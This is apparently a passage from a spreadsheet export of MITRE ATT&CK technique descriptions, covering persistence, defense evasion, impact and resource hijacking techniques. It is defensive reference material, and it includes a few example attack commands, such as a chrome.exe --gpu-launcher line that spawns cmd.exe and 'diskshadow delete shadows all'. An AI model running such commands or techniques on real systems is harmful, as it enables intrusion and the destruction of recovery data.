Due to the functional mechanics of Electron (such as allowing apps to run arbitrary commands), adversaries may also be able to perform malicious functions in the background potentially disguised as legitimate tools within the framework.(Citation: Electron 1) For example, the abuse of `teams.exe` and `chrome.exe` may allow adversaries to execute malicious commands as child processes of the legitimate application (e.g., `chrome.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c calc.exe`).(Citation: Electron 6-8)
Adversaries may also execute malicious content by planting malicious [JavaScript](https://attack.mitre.org/techniques/T1059/007) within Electron applications.(Citation: Electron Security)</t>
  </si>
  <si>
    <t>T1219</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</si>
  <si>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 Remote access modules/features may also exist as part of otherwise existing software (e.g., Google Chrome’s Remote Desktop).(Citation: Google Chrome Remote Desktop)(Citation: Chrome Remote Desktop)</t>
  </si>
  <si>
    <t>T1220</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</si>
  <si>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</si>
  <si>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T1221</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</si>
  <si>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</si>
  <si>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T1222</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</si>
  <si>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</si>
  <si>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</si>
  <si>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 xml:space="preserve">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t>
  </si>
  <si>
    <t>T1480</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</si>
  <si>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
Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)</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</si>
  <si>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</si>
  <si>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Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)</t>
  </si>
  <si>
    <t>T1482</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</si>
  <si>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</si>
  <si>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T1484</t>
  </si>
  <si>
    <t>Adversaries may modify the configuration settings of a domain or identity tenant to evade defenses and/or escalate privileges in centrally managed environments. Such services provide a centralized means of managing identity resources such as devices and accounts, and often include configuration settings that may apply between domains or tenants such as trust relationships, identity syncing, or identity federation.
Modifications to domain or tenant settings may include altering domain Group Policy Objects (GPOs) in Microsoft Active Directory (AD) or changing trust settings for domains, including federation trusts relationships between domains or tenants.
With sufficient permissions, adversaries can modify domain or tenant policy settings. Since configuration settings for these services apply to a large number of identity resources, there are a great number of potential attacks malicious outcomes that can stem from this abuse. Examples of such abuse include:  
* modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions)
* modifying domain trusts to include an adversary-controlled domain, allowing adversaries to  forge access tokens that will subsequently be accepted by victim domain resources(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks)
* changing configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207).
* adding new, adversary-controlled federated identity providers to identity tenants, allowing adversaries to authenticate as any user managed by the victim tenant (Citation: Okta Cross-Tenant Impersonation 2023)
Adversaries may temporarily modify domain or tenant policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.</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</si>
  <si>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t>
  </si>
  <si>
    <t>Adversaries may add new domain trusts, modify the properties of existing domain trusts, or otherwise change the configuration of trust relationships between domains and tenants to evade defenses and/or elevate privileges.Trust details, such as whether or not user identities are federated, allow authentication and authorization properties to apply between domains or tenants for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.
Manipulating these trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, in Microsoft Active Directory (AD) environments, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002) without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert an AD domain to a federated domain using Active Directory Federation Services (AD FS), which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain) 
An adversary may also add a new federated identity provider to an identity tenant such as Okta or AWS IAM Identity Center, which may enable the adversary to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to gain broad access into a variety of cloud-based services that leverage the identity tenant. For example, in AWS environments, an adversary that creates a new identity provider for an AWS Organization will be able to federate into all of the AWS Organization member accounts without creating identities for each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)</t>
  </si>
  <si>
    <t>T1485</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</si>
  <si>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objects, machine images, database instances, and other infrastructure crucial to operations to damage an organization or their customers.(Citation: Data Destruction - Threat Post)(Citation: DOJ  - Cisco Insider)</t>
  </si>
  <si>
    <t>Cloud Storage: Cloud Storage Modification</t>
  </si>
  <si>
    <t>Adversaries may modify the lifecycle policies of a cloud storage bucket to destroy all objects stored within.  
Cloud storage buckets often allow users to set lifecycle policies to automate the migration, archival, or deletion of objects after a set period of time.(Citation: AWS Storage Lifecycles)(Citation: GCP Storage Lifecycles)(Citation: Azure Storage Lifecycles) If a threat actor has sufficient permissions to modify these policies, they may be able to delete all objects at once. 
For example, in AWS environments, an adversary with the `PutLifecycleConfiguration` permission may use the `PutBucketLifecycle` API call to apply a lifecycle policy to an S3 bucket that deletes all objects in the bucket after one day.(Citation: Palo Alto Cloud Ransomware) In addition to destroying data for purposes of extortion and [Financial Theft](https://attack.mitre.org/techniques/T1657), adversaries may also perform this action on buckets storing cloud logs for [Indicator Removal](https://attack.mitre.org/techniques/T1070).(Citation: Datadog S3 Lifecycle CloudTrail Logs)</t>
  </si>
  <si>
    <t>T1486</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1489</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</si>
  <si>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</si>
  <si>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T1490</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</si>
  <si>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 &lt;code&gt;diskshadow.exe&lt;/code&gt; can be used to delete all volume shadow copies on a system - &lt;code&gt;diskshadow delete shadows all&lt;/code&gt; (Citation: Diskshadow) (Citation: Crytox Ransomware)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database backups, machine images, and prior versions of objects designed to be used in disaster recovery scenarios.(Citation: Dark Reading Code Spaces Cyber Attack)(Citation: Rhino Security Labs AWS S3 Ransomware)</t>
  </si>
  <si>
    <t>T1491</t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1495</t>
  </si>
  <si>
    <t>Firmware: Firmware Modification</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>T1496</t>
  </si>
  <si>
    <t>Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. 
Resource hijacking may take a number of different forms. For example, adversaries may:
* Leverage compute resources in order to mine cryptocurrency
* Sell network bandwidth to proxy networks
* Generate SMS traffic for profit
* Abuse cloud-based messaging services to send large quantities of spam messages
In some cases, adversaries may leverage multiple types of Resource Hijacking at once.(Citation: Sysdig Cryptojacking Proxyjacking 2023)</t>
  </si>
  <si>
    <t>Adversaries may leverage the compute resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. 
One common purpose for [Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)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[Compute Hijacking](https://attack.mitre.org/techniques/T1496/001)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t>
  </si>
  <si>
    <t>Adversaries may leverage the network bandwidth resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability.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 Finally, they may engage in internet-wide scanning in order to identify additional targets for compromise.(Citation: Unit 42 Leaked Environment Variables 2024)
In addition to incurring potential financial costs or availability disruptions, this technique may cause reputational damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig Proxyjacking)</t>
  </si>
  <si>
    <t>Adversaries may leverage messaging services for SMS pumping, which may impact system and/or hosted service availability.(Citation: Twilio SMS Pumping) SMS pumping is a type of telecommunications fraud whereby a threat actor first obtains a set of phone numbers from a telecommunications provider, then leverages a victim’s messaging infrastructure to send large amounts of SMS messages to numbers in that set. By generating SMS traffic to their phone number set, a threat actor may earn payments from the telecommunications provider.(Citation: Twilio SMS Pumping Fraud)
Threat actors often use publicly available web forms, such as one-time password (OTP) or account verification fields, in order to generate SMS traffic. These fields may leverage services such as Twilio, AWS SNS, and Amazon Cognito in the background.(Citation: Twilio SMS Pumping)(Citation: AWS RE:Inforce Threat Detection 2024) In response to the large quantity of requests, SMS costs may increase and communication channels may become overwhelmed.(Citation: Twilio SMS Pumping)</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may leverage compromised software-as-a-service (SaaS) applications to complete resource-intensive tasks, which may impact hosted service availability. 
For example, adversaries may leverage email and messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification Service (SNS), SendGrid, and Twilio, in order to send large quantities of spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse 2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking 2024)
In some cases, adversaries may leverage services that the victim is already using. In others, particularly when the service is part of a larger cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking 2024) Leveraging SaaS applications may cause the victim to incur significant financial costs, use up service quotas, and otherwise impact availability. </t>
  </si>
  <si>
    <t>T1497</t>
  </si>
  <si>
    <t>Defense Evasion, Discovery</t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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Once executed, malware may also use [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) to check if it was saved in a folder or file with unexpected or even analysis-related naming artifacts such as `malware`, `sample`, or `hash`.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t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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scrutiny.(Citation: Deloitte Environment Awareness)
Benign commands or other operations may also be used to delay malware execution. Loops or otherwise needless repetitions of commands, such as [Ping](https://attack.mitre.org/software/S0097)s, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments.(Citation: Revil Independence Day)(Citation: Netskope Nitol) Another variation, commonly referred to as API hammering, involves making various calls to [Native API](https://attack.mitre.org/techniques/T1106) functions in order to delay execution (while also potentially overloading analysis environments with junk data).(Citation: Joe Sec Nymaim)(Citation: Joe Sec Trickbot)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t>
  </si>
  <si>
    <t>T1498</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1499</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>T1505</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to access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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1518</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</si>
  <si>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Such software may be deployed widely across the environment for configuration management or security reasons, such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072), and may allow adversaries broad access to infect devices or move laterally.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</si>
  <si>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t>
  </si>
  <si>
    <t>T1525</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</si>
  <si>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t>
  </si>
  <si>
    <t>T1526</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</si>
  <si>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Entra ID,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Microsoft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t>
  </si>
  <si>
    <t>T1528</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</si>
  <si>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Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.
For example, in Kubernetes environments, processes running inside a container may communicate with the Kubernetes API server using service account tokens. If a container is compromised, an adversary may be able to steal the container’s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts)  Similarly, instances within continuous-development / continuous-integration (CI/CD) pipelines will often use API tokens to authenticate to other services for testing and deployment.(Citation: Cider Security Top 10 CICD Security Risks) If these pipelines are compromised, adversaries may be able to steal these tokens and leverage their privileges.
Token theft can also occur through social engineering, in which case user action may be required to grant access.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</si>
  <si>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T1529</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</si>
  <si>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</si>
  <si>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T1530</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</si>
  <si>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</si>
  <si>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T1531</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>T1534</t>
  </si>
  <si>
    <t>After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
For example,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login interfaces.
Adversaries may also leverage internal chat apps, such as Microsoft Teams, to spread malicious content or engage users in attempts to capture sensitive information and/or credentials.(Citation: Int SP - chat apps)</t>
  </si>
  <si>
    <t>T1535</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</si>
  <si>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</si>
  <si>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T1537</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service.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interfaces.(Citation: TLDRSec AWS Attacks)
Adversaries may also use cloud-native mechanisms to share victim data with adversary-controlled cloud accounts, such as creating anonymous file sharing links or, in Azure, a shared access signature (SAS) URI.(Citation: Microsoft Azure Storage Shared Access Signature)
Incidents have been observed where adversaries have created backups of cloud instances and transferred them to separate accounts.(Citation: DOJ GRU Indictment Jul 2018) </t>
  </si>
  <si>
    <t>T1538</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</si>
  <si>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</si>
  <si>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T1539</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</si>
  <si>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Adversaries may also steal cookies by injecting malicious JavaScript content into websites or relying on [User Execution](https://attack.mitre.org/techniques/T1204) by tricking victims into running malicious JavaScript in their browser.(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
There are also open source frameworks such as `Evilginx2` and `Muraena` that can gather session cookies through a malicious proxy (e.g.,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</si>
  <si>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T1542</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</si>
  <si>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</si>
  <si>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computer.(Citation: Wikipedia BIOS)(Citation: Wikipedia UEFI)(Citation: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</si>
  <si>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t>
  </si>
  <si>
    <t>Drive: Drive Modification</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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>T1543</t>
  </si>
  <si>
    <t xml:space="preserve">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privileges.(Citation: OSX Malware Detection)  </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence. When a user logs in, a per-user launchd process is started which loads the parameters for each launch-on-demand user agent from the property list (.plist) file found in &lt;code&gt;/System/Library/LaunchAgents&lt;/code&gt;, &lt;code&gt;/Library/LaunchAgents&lt;/code&gt;, and &lt;code&gt;~/Library/LaunchAgents&lt;/code&gt;.(Citation: AppleDocs Launch Agent Daemons)(Citation: OSX Keydnap malware) (Citation: Antiquated Mac Malware) Property list files use the &lt;code&gt;Label&lt;/code&gt;, &lt;code&gt;ProgramArguments &lt;/code&gt;, and &lt;code&gt;RunAtLoad&lt;/code&gt; keys to identify the Launch Agent's name, executable location, and execution time.(Citation: OSX.Dok Malware) Launch Agents are often installed to perform updates to programs, launch user specified programs at login, or to conduct other developer tasks.
 Launch Agents can also be executed using the [Launchctl](https://attack.mitre.org/techniques/T1569/001) command.
Adversaries may install a new Launch Agent that executes at login by placing a .plist file into the appropriate folders with the &lt;code&gt;RunAtLoad&lt;/code&gt; or &lt;code&gt;KeepAlive&lt;/code&gt; keys set to &lt;code&gt;true&lt;/code&gt;.(Citation: Sofacy Komplex Trojan)(Citation: Methods of Mac Malware Persistence) The Launch Agent name may be disguised by using a name from the related operating system or benign software. Launch Agents are created with user level privileges and execute with user level permissions.(Citation: OSX Malware Detection)(Citation: OceanLotus for OS X) </t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014) Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.  
Systemd utilizes unit configuration files with the `.service` file extension to encode information about a service's process. By default, system level unit files are stored in the `/systemd/system` directory of the root owned directories (`/`). User level unit files are stored in the `/systemd/user` directories of the user owned directories (`$HOME`).(Citation: lambert systemd 2022) 
Inside the `.service` unit files, the following directives are used to execute commands:(Citation: freedesktop systemd.service)  
* `ExecStart`, `ExecStartPre`, and `ExecStartPost` directives execute when a service is started manually by `systemctl` or on system start if the service is set to automatically start.
* `ExecReload` directive executes when a service restarts. 
* `ExecStop`, `ExecStopPre`, and `ExecStopPost` directives execute when a service is stopped.  
Adversaries have created new service files, altered the commands a `.service` file’s directive executes, and modified the user directive a `.service` file executes as, which could result in privilege escalation. Adversaries may also place symbolic links in these directories, enabling systemd to find these payloads regardless of where they reside on the filesystem.(Citation: Anomali Rocke March 2019)(Citation: airwalk backdoor unix systems)(Citation: Rapid7 Service Persistence 22JUNE2016) 
The .service file’s User directive can be used to run service as a specific user, which could result in privilege escalation based on specific user/group permissions. </t>
  </si>
  <si>
    <t>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‘hidden’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t>
  </si>
  <si>
    <t>Adversaries may create or modify Launch Daemons to execute malicious payloads as part of persistence. Launch Daemons are plist files used to interact with Launchd, the service management framework used by macOS. Launch Daemons require elevated privileges to install, are executed for every user on a system prior to login, and run in the background without the need for user interaction. During the macOS initialization startup, the launchd process loads the parameters for launch-on-demand system-level daemons from plist files found in &lt;code&gt;/System/Library/LaunchDaemons/&lt;/code&gt; and &lt;code&gt;/Library/LaunchDaemons/&lt;/code&gt;. Required Launch Daemons parameters include a &lt;code&gt;Label&lt;/code&gt; to identify the task, &lt;code&gt;Program&lt;/code&gt; to provide a path to the executable, and &lt;code&gt;RunAtLoad&lt;/code&gt; to specify when the task is run. Launch Daemons are often used to provide access to shared resources, updates to software, or conduct automation tasks.(Citation: AppleDocs Launch Agent Daemons)(Citation: Methods of Mac Malware Persistence)(Citation: launchd Keywords for plists)
Adversaries may install a Launch Daemon configured to execute at startup by using the &lt;code&gt;RunAtLoad&lt;/code&gt; parameter set to &lt;code&gt;true&lt;/code&gt; and the &lt;code&gt;Program&lt;/code&gt; parameter set to the malicious executable path. The daemon name may be disguised by using a name from a related operating system or benign software (i.e. [Masquerading](https://attack.mitre.org/techniques/T1036)). When the Launch Daemon is executed, the program inherits administrative permissions.(Citation: WireLurker)(Citation: OSX Malware Detection)
Additionally, system configuration changes (such as the installation of third party package managing software) may cause folders such as &lt;code&gt;usr/local/bin&lt;/code&gt; to become globally writeable. So, it is possible for poor configurations to allow an adversary to modify executables referenced by current Launch Daemon's plist files.(Citation: LaunchDaemon Hijacking)(Citation: sentinelone macos persist Jun 2019)</t>
  </si>
  <si>
    <t>Adversaries may create or modify container or container cluster management tools that run as daemons, agents, or services on individual hosts. These include software for creating and managing individual containers, such as Docker and Podman, as well as container cluster node-level agents such as kubelet. By modifying these services, an adversary may be able to achieve persistence or escalate their privileges on a host.
For example, by using the `docker run` or `podman run` command with the `restart=always` directive, a container can be configured to persistently restart on the host.(Citation: AquaSec TeamTNT 2023) A user with access to the (rootful) docker command may also be able to escalate their privileges on the host.(Citation: GTFOBins Docker)
In Kubernetes environments, DaemonSets allow an adversary to persistently [Deploy Container](https://attack.mitre.org/techniques/T1610)s on all nodes, including ones added later to the cluster.(Citation: Aquasec Kubernetes Attack 2023)(Citation: Kubernetes DaemonSet) Pods can also be deployed to specific nodes using the `nodeSelector` or `nodeName` fields in the pod spec.(Citation: Kubernetes Assigning Pods to Nodes)(Citation: AppSecco Kubernetes Namespace Breakout 2020)
Note that containers can also be configured to run as [Systemd Service](https://attack.mitre.org/techniques/T1543/002)s.(Citation: Podman Systemd)(Citation: Docker Systemd)</t>
  </si>
  <si>
    <t>T1546</t>
  </si>
  <si>
    <t xml:space="preserve">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</si>
  <si>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utility.(Citation: Microsoft Change Default Programs)(Citation: Microsoft File Handlers)(Citation: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commands.(Citation: TrendMicro TROJ-FAKEAV OCT 2012)</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</si>
  <si>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inactivity.(Citation: ESET Gazer Aug 2017)</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</si>
  <si>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 or the computer's uptime.(Citation: Mandiant M-Trends 2015)
Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system.(Citation: FireEye WMI SANS 2015)(Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts – using `mofcomp.exe`  –into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription.(Citation: Dell WMI Persistence)(Citation: Microsoft MOF May 2018)
WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.</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</si>
  <si>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code_persistence_zsh)(Citation: macOS MS office sandbox escape)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</si>
  <si>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</si>
  <si>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time.(Citation: Malware Persistence on OS X)</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</si>
  <si>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functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)</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</si>
  <si>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</si>
  <si>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 xml:space="preserve">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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t>Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
Using legitimate applications, adversaries have distributed applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS `postinstall` scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)) with the elevated permissions.(Citation: Application Bundle Manipulation Brandon Dalton)(Citation: wardle evilquest parti)(Citation: Windows AppleJeus GReAT)(Citation: Debian Manual Maintainer Scripts)
Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include `preinst`, `postinst`, `prerm`, `postrm` scripts and run as root when executed.
For Windows, the Microsoft Installer services uses `.msi` files to manage the installing, updating, and uninstalling of applications. These installation routines may also include instructions to perform additional actions that may be abused by adversaries.(Citation: Microsoft Installation Procedures)</t>
  </si>
  <si>
    <t>Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)</t>
  </si>
  <si>
    <t>T1547</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</si>
  <si>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t>
  </si>
  <si>
    <t>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</si>
  <si>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t>
  </si>
  <si>
    <t>Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.(Citation: Microsoft W32Time Feb 2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.(Citation: Microsoft TimeProvider)
Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of `HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\`.(Citation: Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and starts time providers listed and enabled under this key at system startup and/or whenever parameters are changed.(Citation: Microsoft TimeProvider)
Adversaries may abuse this architecture to establish persistence, specifically by creating a new arbitrarily named subkey  pointing to a malicious DLL in the `DllName` value. Administrator privileges are required for time provider registration, though execution will run in context of the Local Service account.(Citation: Github W32Time Oct 2017)</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</si>
  <si>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</si>
  <si>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</si>
  <si>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system.(Citation: Linux Kernel Programming) 
When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0).(Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors, and enabling root access to non-privileged users.(Citation: iDefense Rootkit Overview)
Kernel extensions, also called kext, are used in macOS to load functionality onto a system similar to LKMs for Linux. Since the kernel is responsible for enforcing security and the kernel extensions run as apart of the kernel, kexts are not governed by macOS security policies. Kexts are loaded and unloaded through &lt;code&gt;kextload&lt;/code&gt; and &lt;code&gt;kextunload&lt;/code&gt; commands. Kexts need to be signed with a developer ID that is granted privileges by Apple allowing it to sign Kernel extensions. Developers without these privileges may still sign kexts but they will not load unless SIP is disabled. If SIP is enabled, the kext signature is verified before being added to the AuxKC.(Citation: System and kernel extensions in macOS)
Since macOS Catalina 10.15, kernel extensions have been deprecated in favor of System Extensions. However, kexts are still allowed as "Legacy System Extensions" since there is no System Extension for Kernel Programming Interfaces.(Citation: Apple Kernel Extension Deprecation)
Adversaries can use LKMs and kexts to conduct [Persistence](https://attack.mitre.org/tactics/TA0003) and/or [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) on a system. Examples have been found in the wild, and there are some relevant open source projects as well.(Citation: Volatility Phalanx2)(Citation: CrowdStrike Linux Rootkit)(Citation: GitHub Reptile)(Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle)(Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir)(Citation: Trend Micro Skidmap)</t>
  </si>
  <si>
    <t>Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named &lt;code&gt;com.apple.loginwindow.[UUID].plist&lt;/code&gt; within the &lt;code&gt;~/Library/Preferences/ByHost&lt;/code&gt; directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the &lt;code&gt;com.apple.loginwindow.[UUID].plist&lt;/code&gt; file to execute payloads when a user logs in.</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</si>
  <si>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t>
  </si>
  <si>
    <t>Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.
Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.(Citation: Shortcut for Persistence ) Although often used as payloads in an infection chain (e.g. [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)), adversaries may also create a new shortcut as a means of indirection, while also abusing [Masquerading](https://attack.mitre.org/techniques/T1036) to make the malicious shortcut appear as a legitimate program. Adversaries can also edit the target path or entirely replace an existing shortcut so their malware will be executed instead of the intended legitimate program.
Shortcuts can also be abused to establish persistence by implementing other methods. For example, LNK browser extensions may be modified (e.g. [Browser Extensions](https://attack.mitre.org/techniques/T1176)) to persistently launch malware.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the &lt;code&gt;AddMonitor&lt;/code&gt; API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in &lt;code&gt;C:\Windows\System32&lt;/code&gt; and will be loaded and run by the print spooler service, `spoolsv.exe`, under SYSTEM level permissions on boot.(Citation: Bloxham) 
Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to the `Driver` value of an existing or new arbitrarily named subkey of &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors&lt;/code&gt;. The Registry key contains entries for the following:
* Local Port
* Standard TCP/IP Port
* USB Monitor
* WSD Port
</t>
  </si>
  <si>
    <t>Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, `spoolsv.exe`, during boot.(Citation: Microsoft Intro Print Processors)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malicious print processor to be correctly installed, the payload must be located in the dedicated system print-processor directory, that can be found with the &lt;code&gt;GetPrintProcessorDirectory&lt;/code&gt; API call, or referenced via a relative path from this directory.(Citation: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t>
  </si>
  <si>
    <t>Adversaries may add or modify XDG Autostart Entries to execute malicious programs or commands when a user’s desktop environment is loaded at login. XDG Autostart entries are available for any XDG-compliant Linux system. XDG Autostart entries use Desktop Entry files (`.desktop`) to configure the user’s desktop environment upon user login. These configuration files determine what applications launch upon user login, define associated applications to open specific file types, and define applications used to open removable media.(Citation: Free Desktop Application Autostart Feb 2006)(Citation: Free Desktop Entry Keys)
Adversaries may abuse this feature to establish persistence by adding a path to a malicious binary or command to the `Exec` directive in the `.desktop` configuration file. When the user’s desktop environment is loaded at user login, the `.desktop` files located in the XDG Autostart directories are automatically executed. System-wide Autostart entries are located in the `/etc/xdg/autostart` directory while the user entries are located in the `~/.config/autostart` directory.
Adversaries may combine this technique with [Masquerading](https://attack.mitre.org/techniques/T1036) to blend malicious Autostart entries with legitimate programs.(Citation: Red Canary Netwire Linux 2022)</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</si>
  <si>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t>
